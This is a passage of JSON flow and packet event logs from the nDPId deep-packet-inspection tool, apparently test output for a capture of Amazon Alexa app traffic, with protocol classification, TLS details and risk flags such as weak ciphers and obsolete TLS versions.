-00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":992,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071385,"flow_last_seen":1490976071441,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071441,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":993,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071286,"flow_last_seen":1490976071444,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976071444,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":998,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1490976071448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071448,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw0V1AAOcGzpw0XuiGrBAq2AG76TIsDp+yTuXca3ASH\/6OPgAAAgQFtAEDAwY="} 
-00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1490976071449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071449,"pkt":"AMDKkaPvePiC0\/vCCABFAAAohlpAAEAGwKisECrYNF7ohukyAbtO5dxrLA6fs1AQAVfYrwAA"} -01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1000,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071392,"flow_last_seen":1490976071451,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976071451,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1006,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976071380,"flow_last_seen":1490976071486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976071486,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1013,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071349,"flow_last_seen":1490976071501,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976071501,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01828{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1020,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976071392,"flow_last_seen":1490976071512,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3459,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1490976071512,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., 
CN=pitangui.amazon.com","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1039,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071583,"flow_last_seen":1490976071583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071583,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1039,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1490976071583,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071583,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8H+ZAAEAGJwmsECrYNF7ohrKCAbsHHkWgAAAAAKAC\/\/\/3+QAAAgQFtAQCCAoA9lpGAAAAAAEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1057,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1490976071640,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071640,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwgCVAAOcGH9U0XuiGrBAq2AG7soJWhIA2Bx5FoXASH\/6YhgAAAgQFtAEDAwY="} 
-00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1490976071641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071641,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoH+dAAEAGJxysECrYNF7ohrKCAbsHHkWhVoSAN1AQAVfi9wAA"} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1059,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071583,"flow_last_seen":1490976071642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071642,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1063,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071583,"flow_last_seen":1490976071700,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976071700,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1076,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976071385,"flow_last_seen":1490976071803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1490976071803,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976076042,"flow_last_seen":1490976076042,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976076042,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1490976076042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976076042,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8BbZAAEAGQTmsECrYNF7ohpD5Abuu0lmyAAAAAKAC\/\/9b\/gAAAgQFtAQCCAoA9lwEAAAAAAEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1490976076114,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976076114,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwMG5AAOcGb4w0XuiGrBAq2AG7kPnjZM+NrtJZs3ASH\/4iEQAAAgQFtAEDAwY="} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1115,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1490976076117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976076117,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoBbdAAEAGQUysECrYNF7ohpD5Abuu0lmz42TPjlAQAVdsggAA"} 
-00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1116,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976076042,"flow_last_seen":1490976076117,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976076117,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01106{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1118,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976076042,"flow_last_seen":1490976076167,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976076167,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1128,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976076275,"flow_last_seen":1490976076275,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976076275,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1490976076275,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976076275,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Bx5AAEAGP9GsECrYNF7ohsHNAFDXKVsFAAAAAKAC\/\/8C1AAAAgQFtAQCCAoA9lwbAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1130,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1490976076338,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976076338,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwijBAAOcGFco0XuiGrBAq2ABQwc3F00\/v1ylbBnASH\/5mLQAAAgQFtAEDAwY="} 
-00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":3,"flow_last_seen":1490976076340,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976076340,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoBx9AAEAGP+SsECrYNF7ohsHNAFDXKVsGxdNP8FAQAVewngAA"} -00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1132,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976076275,"flow_last_seen":1490976076341,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":780,"flow_tot_l4_payload_len":780,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1490976076341,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1141,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976080485,"flow_last_seen":1490976080485,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976080485,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1141,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1490976080485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976080485,"pkt":"AMDKkaPvePiC0\/vCCABFAAA80qBAAEAGOXysECrYIsc08JYEAbs8Ao8fAAAAAKAC\/\/9XyQAAAgQFtAQCCAoA9l2\/AAAAAAEDAwg="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1142,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1490976080542,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976080542,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAOsGYRwixzTwrBAq2AG7lgTyw5w6PAKPIKASaN+a6gAAAgQFtAQCCApEF4DYAPZdvwEDAwg="} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1143,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":1490976080543,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976080543,"pkt":"AMDKkaPvePiC0\/vCCABFAAA00qFAAEAGOYOsECrYIsc08JYEAbs8Ao8g8sOcO4AQAVcxOQAAAQEICgD2XcZEF4DY"} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1144,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976080485,"flow_last_seen":1490976080544,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976080544,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1146,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976080485,"flow_last_seen":1490976080606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1708,"flow_avg_l4_payload_len":284,"midstream":0,"thread_ts_msec":1490976080606,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01328{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976080485,"flow_last_seen":1490976080607,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3649,"flow_avg_l4_payload_len":456,"midstream":0,"thread_ts_msec":1490976080607,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","server_names":"cognito-identity.amazonaws.com,cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=cognito-identity.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"56:17:8F:E9:45:10:32:78:FF:FD:E3:09:60:5A:B5:3B:8D:8C:F8:34"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1168,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976082723,"flow_last_seen":1490976082723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976082723,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1168,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1490976082723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976082723,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8n\/hAAEAGdDKsECrYNu8YuoUFAbsbksFnAAAAAKAC\/\/9eHgAAAgQFtAQCCAoA9l6fAAAAAAEDAwg="} 